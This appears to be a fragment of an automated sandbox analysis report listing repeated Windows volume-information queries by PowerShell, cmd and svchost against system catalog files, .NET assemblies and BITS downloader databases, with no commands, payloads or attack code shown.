Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
